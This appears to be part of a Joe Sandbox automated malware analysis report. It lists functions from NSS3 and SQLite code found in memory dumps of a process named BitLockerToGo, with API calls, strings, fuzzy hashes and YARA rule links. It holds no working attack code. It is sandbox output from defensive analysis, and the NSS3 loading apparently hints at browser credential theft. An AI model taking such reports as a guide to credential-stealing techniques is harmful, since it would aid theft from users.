                                                                                                                                                                                                                                                                                                                                                          Function 6C639DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3 ref: 6C639E1F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5F13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C5C2352,?,00000000,?,?), ref: 6C5F1413
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5F13C0: memcpy.VCRUNTIME140(00000000,R#\l,00000002,?,?,?,?,6C5C2352,?,00000000,?,?), ref: 6C5F14C0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • LIKE or GLOB pattern too complex, xrefs: 6C63A006
                                                                                                                                                                                                                                                                                                                                                          • ESCAPE expression must be a single character, xrefs: 6C639F78
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2453365862-264706735
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3f44d4e252e35008815443d09de7e03533c9aec75ac88e6aa9b13785b7d01374
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8595a6c6fa98bf6fde686923127bd6a10c75e6dbdb78791a43d2f3e8eefd34ef
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f44d4e252e35008815443d09de7e03533c9aec75ac88e6aa9b13785b7d01374
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B081E771A046658BDB00CF29C4803A9B7B2AF4531CF28B65DD8AC8BBC1DB35D846CF94
                                                                                                                                                                                                                                                                                                                                                          Function 6C694D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C694D57
                                                                                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C694DE6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorR_snprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: %d.%d
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2298970422-3954714993
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c1d7df753a27f3f07e7b88d26fbd463b935d3d13eba1849ef0097a158585b170
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4872f479fd392f55f0b81fc10a888a19ce8411e39e5f9368e05cb277f3647e34
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1d7df753a27f3f07e7b88d26fbd463b935d3d13eba1849ef0097a158585b170
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 943100B2D042196BEF109B619C05BFF77B8DF45308F050429ED159B751EB709909CBE9
                                                                                                                                                                                                                                                                                                                                                          Function 6C730900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?), ref: 6C730917
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?), ref: 6C730923
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5F13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C5C2352,?,00000000,?,?), ref: 6C5F1413
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5F13C0: memcpy.VCRUNTIME140(00000000,R#\l,00000002,?,?,?,?,6C5C2352,?,00000000,?,?), ref: 6C5F14C0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_value_text$memcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: error in %s %s%s%s: %s
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1937290486-1007276823
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 74cc8fad414ecf71f2103e14aa85d7eaa1edafb9ee3deff52d8ff06a772cb6c4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd0c9c9a3175affeec2b982eb1ee5012d2215358b86f8c4f7fd98cfb60c9fab1
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74cc8fad414ecf71f2103e14aa85d7eaa1edafb9ee3deff52d8ff06a772cb6c4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 240108F6E001489BEB009E58ED019BB7BB5EFD5258F144039ED489B711F7329D1487A1
                                                                                                                                                                                                                                                                                                                                                          Function 6C6B4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3('8kl,00000000,00000000,?,?,6C6B3827,?,00000000), ref: 6C6B4D0A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A08B4
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C6B4D22
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C641A3E,00000048,00000054), ref: 6C69FD56
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID: '8kl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1521942269-4107559852
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c8d7fc3e2e47bad4948bbf04271b4fd4538cb2a714aabe690d5f93019bee7888
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EF0623260122567EB104F6BAC80B6736DC9B427BDF150271ED28EB791E6B1CC1587E9
                                                                                                                                                                                                                                                                                                                                                          Function 6C6DAF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetUniqueIdentity.NSS3(SSL), ref: 6C6DAF78
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C63ACE2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: malloc.MOZGLUE(00000001), ref: 6C63ACEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C63AD02
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: TlsGetValue.KERNEL32 ref: 6C63AD3C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: calloc.MOZGLUE(00000001,?), ref: 6C63AD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: PR_Unlock.NSS3 ref: 6C63ADC0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: PR_Unlock.NSS3 ref: 6C63AE8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: free.MOZGLUE(?), ref: 6C63AEAB
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C7A3084,6C7A02AC,00000090), ref: 6C6DAF94
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: SSL
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2424436289-2135378647
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c8fecbdf8748ff9954ea1c44c0a1f2cb3d32278650918942c0fc0644176a1992
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a37cf5054e64b4dbd33b6cb4265ffc0676907bbe8b1aeed3059d4f57392c46e8
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8fecbdf8748ff9954ea1c44c0a1f2cb3d32278650918942c0fc0644176a1992
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37215CB2605A48EECB10DFD3B54731BBB72BB82249712512CD11A4BB29D731E004AFD9
                                                                                                                                                                                                                                                                                                                                                          Function 6C64C810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]dl,6C646499,-00000078,00000000,?,?,]dl,?,6C645DEF,?), ref: 6C64C821
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C641DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C641E0B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C641DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C641E24
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]dl,?,6C645DEF,?,?,?), ref: 6C64C857
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
                                                                                                                                                                                                                                                                                                                                                          • String ID: ]dl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 221937774-179191621
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8e522ca2834357ab4957b62ff9c34331d1f0548b13c5c6b67aace7caceeb7199
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7F0A777A005147BEF0169656C04AFF3A59DF82259F048031FE05D6751F722C92987ED
                                                                                                                                                                                                                                                                                                                                                          Function 6C630F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetPageSize.NSS3(6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F1B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631370: GetSystemInfo.KERNEL32(?,?,?,?,6C630936,?,6C630F20,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000), ref: 6C63138F
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLogModule.NSS3(clock,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F25
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C630936,00000001,00000040), ref: 6C631130
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C630936,00000001,00000040), ref: 6C631142
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C630936,00000001), ref: 6C631167
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: InfoModulePageSecureSizeSystemcallocstrdup
                                                                                                                                                                                                                                                                                                                                                          • String ID: clock
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 536403800-3195780754
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9ba15f15311cddfb3b6822d7f9e777555e5cabedd561a983efe3874c4ffe0a2e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 98e37f0c58bb644f90ceca782a1912422ddb4ca20b17865a1b57717e06827047
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ba15f15311cddfb3b6822d7f9e777555e5cabedd561a983efe3874c4ffe0a2e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88D0123160416895D6116697AC45BDFB7ACCBC327AF107836E12C41D104B6890DAD67D
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$calloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3339632435-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6b817a6f556abafce39897c6e01aea0c132d76299bf4d87b0fed8e9ce6f4f58c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 436dba39e563bcfc561387dc556adc1ee868f151373a8a8af3b7a903da3912de
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b817a6f556abafce39897c6e01aea0c132d76299bf4d87b0fed8e9ce6f4f58c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6031C470644390CFEB006FB8D5842997BB4BF06349F115679D89AC7A21EB35C887DB89
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C642AF5,?,?,?,?,?,6C640A1B,00000000), ref: 6C6A0F1A
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000001), ref: 6C6A0F30
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6A0F42
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6A0F5B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Valuemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2332725481-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0161e0d6cfd814278453275765f93ae96bf338ef896445b640bd3ddc998366b9
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fea6e99d3686e620313514d20b2fdc41b8a7c4e090da03e37789d77d41d2561c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0161e0d6cfd814278453275765f93ae96bf338ef896445b640bd3ddc998366b9
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6301F071E002905BE7101B7E9E085977AACEF47399F011571EC1DD3A21DB31CC56C5EA